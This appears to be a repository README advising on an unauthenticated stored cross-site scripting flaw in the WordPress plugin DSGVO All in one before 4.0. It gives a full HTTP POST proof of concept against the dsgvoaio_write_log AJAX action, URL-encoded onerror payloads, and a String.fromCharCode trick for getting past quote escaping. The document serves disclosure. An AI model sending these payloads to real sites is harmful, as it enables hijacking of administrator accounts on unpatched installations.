.. | |||
README.md | Loading last commit info... |
README.md
DSGVO All in one for WP < 4.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
Description
The dsgvoaio_write_log AJAX action of the plugin did not sanitise or escape some POST parameter submitted before outputting them in the Log page in the administrator dashboard (wp-admin/admin.php?page=dsgvoaiofree-show-log). This could allow unauthenticated attackers to gain unauthorised access by using an XSS payload to create a rogue administrator account, which will be trigged when an administrator will view the logs.
Proof of Concept
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
action=dsgvoaio_write_log&id=%3cimg%20src%20onerror%3dalert(%2fXSS-Id%2f)%3e&state=true&key=wordpressmain&name=All&allvalue%5B%5D=%3cimg%20src%20onerror%3dalert(%2fXSS-value%2f)%3e
Payload will be processed by update_option(). This will lead into escaped single and double qoutes. You can use
the String.fromCharCode string construction to bypass this limitation, such as %3Cimg%20src%3D1%20style%3Ddisplay%3Anone%20onerror%3Deval(String.fromCharCode(97%2C108%2C101%2C114%2C116%2C40%2C49%2C50%2C41))%3E